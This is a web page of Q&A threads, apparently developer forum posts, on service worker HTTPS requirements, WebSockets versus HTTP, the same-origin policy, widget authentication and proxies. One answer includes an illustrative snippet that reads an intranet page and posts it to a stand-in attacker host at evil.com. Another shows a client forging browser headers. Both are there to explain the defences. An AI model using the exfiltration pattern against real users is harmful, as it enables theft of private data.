I am learning about the Service Worker API and have found many cool features in it. But what puzzles me is why it works only on HTTPS sites and not on HTTP sites.
I believe this has something to do with security, yet I couldn't find the reason while browsing. Any explanation of this would be appreciated...
Since service workers are rather powerful, being able to run even when the original page is no longer open, you really want to limit who can set one up and who can't. A plain HTTP request is very easily man-in-the-middled, so any random JavaScript could be injected into such a request, and that JavaScript could set up a service worker. That means your ISP, a government like China, or a serious attacker could set up service workers very easily. By requiring an HTTPS connection, men-in-the-middle are largely avoided, and you can at least be sure that the JavaScript setting up the service worker actually came from the page you think it did.
To complement deceze's answer: if an attacker man-in-the-middles a connection to an HTTP site, they compromise that site for that connection only. A later connection to the site is not guaranteed to be compromised, and attacks that rely on local network access, for instance, may not be easily reproducible.
If one could register a service worker on HTTP sites, an attacker would only need a single man-in-the-middle attack to become, forever (or at least until that browser's storage is cleared), the source of the content for the said site.
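For what it's worth, the browser enforces this through the notion of a "secure context". A minimal sketch of a registration attempt, assuming a worker script at a hypothetical /sw.js path:

    // Minimal sketch, assuming a worker script at /sw.js (hypothetical path).
    // Registration only succeeds in a secure context: HTTPS pages, or
    // http://localhost during development.
    if ('serviceWorker' in navigator && window.isSecureContext) {
      navigator.serviceWorker.register('/sw.js')
        .then(reg => console.log('service worker registered, scope:', reg.scope))
        .catch(err => console.error('registration failed:', err));
    } else {
      console.log('no secure context (or no support): registration not attempted');
    }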
Related
I am designing an architecture for a web application using Node.js, and we need to be able to send medium-sized files to the client from a gallery. As a user browses the gallery, they will be sent these binary files as fast as possible (one for each gallery item). The files could go up to 6 MB, but probably average around 2 MB.
My client is insisting that we use WebSockets for data transfer instead of XHR. Just to be clear, we don't need bi-directional communication.
I lack the experience in this domain and need help in my reasoning.
My points so far are the following:
Using WebSockets breaks any client-side caching that would be provided by HTTP. Users would be forced to re-download content if they visited the same item in the gallery twice.
WebSocket messages cannot be handled by/routed to proxy caches. They must always be handled by an explicit server.
CDNs are built to provide extensive web caching, intercepting HTTP requests. WebSockets would limit us from leveraging CDNs.
I guess that Node.js would be able to respond faster to hundreds or thousands of XHRs than to the same number of concurrent WebSocket connections.
Are there any technical arguments for or against using WebSockets for pure data transfer instead of standard HTTP requests? Can anyone refute or confirm my points and maybe provide links to help with my research?
I found this link very helpful: https://www.mnot.net/cache_docs/#PROXY
Off the top of my head, I can see the following technical arguments for XHR, besides the fact that it uses HTTP and therefore benefits from caching (which is essential for speed):
HTTP is the dedicated protocol for file downloads. It's natively built into browsers (via the XHR interface), so it's better optimised and easier for the developer to use.
HTTP already provides a lot of the things you'd have to hand-craft over WebSockets: file path requests, auth, sessions, caching… all of it on both the client and server side.
XHR has better support even in older browsers
some firewalls only allow HTTP(S) connections
There don't seem to be any technical reasons to prefer WebSockets; the only thing that might affect your choice is "the client is king". You might be able to convince him, though, by telling him how much he would have to pay you to reimplement the HTTP features on top of a WebSocket connection. It ain't cheap, especially as your application gets more complex.
Btw, I wouldn't support your last point. Node should be able to deal with just as many WebSocket connections as HTTP connections; if properly optimised, the two are about even. However, if your server architecture is not based solely on Node, there is a multitude of plain file-serving applications that are probably faster than Node (not even counting the HTTP caching layer).
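To make the caching point concrete, here is a minimal client-side sketch; the /gallery/<id>.bin endpoint is made up for illustration. It shows what the plain HTTP route gives you for free and what you would have to reinvent over a WebSocket:

    // Minimal sketch, hypothetical /gallery/<id>.bin endpoint: a plain HTTP
    // download goes through the browser's HTTP cache, so revisiting the same
    // gallery item can be answered by a conditional request (304) or served
    // locally with no network traffic at all.
    async function loadGalleryItem(id) {
      const res = await fetch(`/gallery/${id}.bin`, { credentials: 'same-origin' });
      if (!res.ok) throw new Error(`download failed: ${res.status}`);
      return res.arrayBuffer(); // the 2-6 MB binary payload
    }

    // Over a WebSocket you would have to hand-roll all of that: frame a
    // "send me item 42" message, correlate the binary reply with the request,
    // and build your own client-side cache, because the HTTP cache (and any
    // proxy or CDN cache) never sees the data.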
As part of a thought experiment, I am attempting to ascertain whether there is any hope of a server providing a piece of data solely for receipt and use by a browser environment, i.e. data that could not be read by a bot crawling my site.
Clearly, if that information is sent in the source code, or indeed via any usual HTTP means, this can be picked up by a bot - so far, so simple.
But what if the information were instead transmitted by the server as a WebSocket message: wouldn't it be receivable only by some corresponding (and possibly authenticated) JavaScript in the browser environment, thus precluding its interception by a bot?
(This is based on my assumption that a bot has no client environment and is essentially a malicious server-side script calling a site over something like cURL, pretending to be a user).
Another way of phrasing this question might be: with the web implementation of websockets, is the receipt of messages always done by a client environment (i.e. JS)?
I can't answer about websockets, but a sufficiently motivated attacker will find a way to emulate whatever environment you require. By loading this content through AJAX, you can eliminate the casual bots, and you can eliminate well-behaved bots with robots.txt.
Using WebSocket makes no difference. You cannot escape the following fact: you can always write a non-browser client that looks and behaves to the server exactly as any standard browser.
I can fake any HTTP headers (like browser vendor, etc.) you might read. The Origin header doesn't help either (I can fake it). Neither do cookies; I'll read them and send them back.
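As an illustration of how little effort that takes, here is a hedged sketch of a non-browser client using the Node "ws" package; the URL and header values are all made up:

    // Minimal sketch, assuming the Node "ws" package; the URL and header
    // values are made up. A non-browser client can present any headers it
    // likes and receives the "browser-only" messages just the same.
    const WebSocket = require('ws');

    const ws = new WebSocket('wss://example.com/feed', {
      headers: {
        Origin: 'https://the-site-you-trust.example',             // faked
        'User-Agent': 'Mozilla/5.0 (pretending to be a browser)',  // faked
        Cookie: 'session=value-read-from-an-earlier-response'      // replayed
      }
    });

    ws.on('message', (data) => {
      console.log('received', data.length, 'bytes of "browser-only" data');
    });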
You might get away with protecting your site using strong captchas, and setting cookies only after the captcha has been solved. That depends on the captcha being unsolvable by bots, though.
Given the simplicity of writing a server-side proxy that fetches data across domains, I'm at a loss as to what the original intention was in preventing client-side AJAX from making cross-domain calls. I'm not asking for speculation; I'm looking for documentation from the language designers (or people close to them) about what they thought they were doing, other than simply creating a mild inconvenience for developers.
TIA
It's to prevent the browser from acting as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that office has an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross-domain policy didn't exist, www.evil.com could make AJAX requests to http://intranet.company.com, using your browser as a reverse proxy, and then send that information back to www.evil.com with another AJAX request.
This is one of the reasons for the restriction, I guess.
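To make that concrete, here is a hedged sketch (the intranet path and the attacker's collection endpoint are made up) of exactly the kind of request the same-origin policy is there to stop:

    // What a script on www.evil.com would love to do, and what the
    // same-origin policy / CORS prevents today (URLs are made up):
    fetch('http://intranet.company.com/payroll')   // runs inside the office network
      .then(res => res.text())                     // blocked: evil.com may not read this
      .then(secret =>
        fetch('https://www.evil.com/collect', {    // exfiltrate what was read
          method: 'POST',
          body: secret
        })
      );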
If you're the author for myblog.com and you make an XHR to facebook.com, should the request send your facebook cookie credentials? No, that would mean that you could request users' private facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless Facebook's script decides to send you the information from their JS code, you won't have access to it.
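A minimal JSONP sketch (the endpoint is hypothetical) makes that concrete: the only data you ever receive is whatever the other site's script chooses to hand to your callback.

    // Minimal JSONP sketch; the endpoint is hypothetical. The response is a
    // script like `handleData({"public": "stuff"})`, so you only ever see
    // what the other site explicitly passes to your callback -- never its
    // cookies or the raw response.
    function handleData(payload) {
      console.log('the remote site chose to share:', payload);
    }

    const script = document.createElement('script');
    script.src = 'https://api.example.com/data?callback=handleData'; // hypothetical
    document.head.appendChild(script);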
The most important reason for this limit is a security concern: should a JSON request make the browser send and accept cookies or security credentials with a request to another domain? It is not a concern with a server-side proxy, because the proxy doesn't have direct access to the client environment. There was a proposal for safe, sanitized JSON-specific request methods, but it hasn't been implemented anywhere yet.
The difference between direct access and a proxy is cookies and other security-relevant identification/verification information, which are strictly restricted to one origin.
With those, your browser can access sensitive data. Your proxy can't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.
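As a hedged sketch of that boundary (the endpoint is made up): by default a cross-origin fetch neither attaches the user's cookies nor lets your script read the response; the browser only relaxes this when the other server explicitly opts in with CORS headers.

    // Hypothetical endpoint. The browser will only attach cookies and expose
    // the response if the other server answers with a matching
    // Access-Control-Allow-Origin *and* Access-Control-Allow-Credentials: true.
    fetch('https://api.other-site.example/profile', { credentials: 'include' })
      .then(res => res.json())
      .then(profile => console.log('allowed by CORS:', profile))
      .catch(err => console.error('blocked: the server did not opt in', err));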
I know you are asking for experts' answers; I'm just a neophyte, and this is my opinion on why a server-side proxy is not a proper final solution:
Building a server-side proxy is not as easy as not building it at all.
It's not always possible, as with a third-party JS widget. You're not going to ask all your publishers to declare a DNS record just to integrate your widget, nor to modify the document.domain of their pages, with all the collateral issues that brings.
As I read in the book Third-Party JavaScript, "it requires loading an intermediary tunnel file before it can make cross-domain requests". At the very least you end up bringing JSONP into the game, with even trickier juggling.
It isn't supported by IE8; also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security issues, as people have explained in other answers, and even more besides; see chapter 4.3.2, "Message exchange using subdomain proxies", of the above book.
And the most important for me:
It is a hack, like the JSONP solution; it's time for a standard, reliable, secure, clean and comfortable solution.
But after re-reading your question, I think I still didn't answer it. So why this AJAX security restriction? Again, I think the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server inside your office's intranet.
We have a "widget" that runs on 3rd party websites, that is, anyone who signs up with our service and embeds the JavaScript.
At the moment we use JSONP for all communication. We can securely sign people in and create accounts via the use of an iFrame and some magic with detecting load events on it. (Essentially, we wait until the iFrames source is pointing back to the clients domain before reading a success value out of the title of it).
Because we're running on JSONP, we can use the browsers HTTP cookies to detect if the user is logged in.
However, we're in the process of transitioning our system to run realtime and over web sockets. We will still have the same method for authentication but we won't necessarily be making other calls using JSONP. Instead those calls will occur over websockets (using the library Faye)
How can I secure this? The potential security holes is if someone copies the JavaScript off an existing site, alters it, then gets people to visit their site instead. I think this defeats my original idea of sending back a secure token on login as the malicious JavaScript would be able to read it then use it perform authenticated actions.
Am I better off keeping my secure actions running over regular JSONP and my updates over WebSockets?
WebSocket connections receive cookies only during the opening handshake. The only site that can access your WebSocket connection is the one that opened it, so if you're opening your connection after authentication, I presume your security will be comparable to your current JSONP implementation.
That is not to say that your JSONP implementation is secure. I don't know that it isn't, but are you checking the referrers for your JSONP requests to ensure they're really coming from the same 3rd-party site that logged in? If not, you already have a security issue from other sites embedding your javascript.
In any case, the 3rd-party having an XSS vulnerability would also be a very big problem, but presumably you know that already.
Whether the browser sends you cookies during the WebSocket opening handshake (and if so, which cookies) is not specified by the WS spec. It's left up to browser vendors.
A WS connection can be opened to any site, not only to the site that originally served the JS making the connection. However, browsers MUST set the "Origin" HTTP header in the WS opening handshake to the origin that served that JS. The server is then free to accept or deny the connection.
You could, for example, generate a random string in JS, store it client-side, and let that plus the client IP take part in computing an auth token for the WS connection.
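A minimal server-side sketch along those lines, assuming the Node "ws" package; the port and the allowlist of publisher origins are made up. Remember that only browsers are forced to send a truthful Origin; non-browser clients can still fake it, as noted in other answers.

    // Minimal sketch, assuming the Node "ws" package. Browsers must send
    // their real Origin, so this keeps other people's pages from opening
    // authenticated sockets against your server.
    const WebSocket = require('ws');

    const ALLOWED_ORIGINS = new Set(['https://a-signed-up-publisher.example']); // hypothetical

    const wss = new WebSocket.Server({ port: 8080 });

    wss.on('connection', (socket, request) => {
      if (!ALLOWED_ORIGINS.has(request.headers.origin)) {
        socket.close(1008, 'origin not allowed'); // 1008 = policy violation
        return;
      }
      // ...verify the per-login auth token here before trusting any messages
    });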
http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious: you can use a proxy to get XML or JavaScript from another domain with XMLHttpRequest without running into same-origin restrictions. However, I don't hear much about disadvantages compared to other methods -- are there any, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
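For illustration, here is a minimal Node sketch of such a locked-down proxy; the upstream URL and local route are made up. It relays exactly one fixed resource, so it cannot be abused as an open relay to arbitrary sites.

    // Minimal sketch; the upstream URL and local route are hypothetical.
    const http = require('http');
    const https = require('https');

    const UPSTREAM = 'https://feeds.example.com/data.xml'; // the only allowed target

    http.createServer((req, res) => {
      if (req.url !== '/proxy/feed') {   // anything else is refused
        res.statusCode = 404;
        res.end();
        return;
      }
      https.get(UPSTREAM, (upstream) => {
        res.writeHead(upstream.statusCode || 502, {
          'Content-Type': upstream.headers['content-type'] || 'application/xml'
        });
        upstream.pipe(res);             // stream the upstream body to the client
      }).on('error', () => {
        res.statusCode = 502;
        res.end();
      });
    }).listen(8080);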
Overhead -- both for the user (who now has to wait for your server to request and receive data from the proxied source) and for you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model, potentially allowing the user to be compromised. So unless you absolutely trust the server you are communicating with (that means no random ads, no user-defined content in the page[s] you are proxying), you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.